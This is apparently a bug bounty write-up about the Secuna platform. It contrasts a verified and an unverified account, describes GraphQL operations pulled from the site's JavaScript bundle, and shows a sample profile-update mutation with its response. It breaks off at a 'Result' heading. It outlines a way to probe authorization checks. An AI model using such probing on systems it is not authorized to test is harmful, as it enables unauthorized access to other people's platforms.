Details #
Currently i have 2 accounts at secuna.
- https://app.secuna.io/ctulhu – Verified
- https://app.secuna.io/imongmama – Not Verified
As a verified user in Secuna you should be able to update your profile,submit reports,view disclosed reports and update payout method meanwhile if your account is not verified you should not be able to submit reports, view disclosed reports, update your profile and etc.
If you login using your non-verified secuna account you will be only redirected to https://app.secuna.io/account-verification
Since i already mapped out Secuna’s GraphQL Endpoint ( https://app.secuna.io/static/js/main.80713d8f.chunk.js)
Sample GraphQL Request: #
Server Request
POST /api/graphql HTTP/1.1
Host: app.secuna.io
content-type: application/json
authorization: Bearer
{"operationName":"updateAboutHackerProfile","variables":{"bio":"meh","location":"Philippines","website":"https://ctulhu.me"},"query":"mutation updateAboutHackerProfile($bio: String!, $location: String, $website: String) {\n updateAboutHackerProfile(bio: $bio, location: $location, website: $website) {\n bio\n location\n socialMedia {\n github\n website\n facebook\n linkedin\n instagram\n }\n }\n}\n"}
This will update my Bio to “meh” Location to “Philippines” Website to “https://ctulhu.me” the Operation is set to “mutation” which will write followed by a fetch of Bio,location,socialmedia,github,website etc.
GraphQL Operations #
In graphQL there are 3 types of operations:
- query: a read‐only fetch.
- mutation: a write followed by a fetch.
- subscription: a long‐lived request that fetches data in response to source events.
Each operation is represented by an optional operationName and a selection set. If we send the above Request, We will receive the Response Below.
Server response
POST /api/graphql HTTP/1.1
Host: app.secuna.io
content-type: application/json
authorization: Bearer
{"data":{"updateAboutHackerProfile":{"bio":"meh","location":"Philippines","socialMedia":{"facebook":null,"github":null,"instagram":null,"linkedin":null,"website":"https://ctulhu.me"}}}}
Result #